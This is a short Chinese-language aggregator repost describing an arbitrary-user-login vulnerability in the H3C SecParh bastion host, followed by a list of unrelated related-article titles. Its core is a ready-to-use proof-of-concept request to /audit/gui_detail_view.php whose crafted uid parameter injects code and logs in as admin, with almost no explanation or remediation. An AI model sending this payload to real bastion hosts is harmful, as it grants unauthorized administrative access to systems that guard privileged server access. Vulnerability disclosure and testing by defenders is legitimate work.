H3C SecParh堡垒机任意用户登录

Posted 李白你好

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了H3C SecParh堡垒机任意用户登录相关的知识,希望对你有一定的参考价值。

漏洞描述:

H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞

与齐治堡垒机出现的漏洞相似

漏洞复现:

POC:

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

以上是关于H3C SecParh堡垒机任意用户登录的主要内容,如果未能解决你的问题,请参考以下文章

行云管家堡垒机如何登录服务器

ftp/sftp不使用webportal直接登录到目标系统设置文档-麒麟开源堡垒机技术文档之一

【实践】如何使用XSHELL配置从堡垒机跳转到目标服务器

堡垒机

堡垒机怎么在ssh弹出浏览器

Jumpserver堡垒机问题和Bug汇总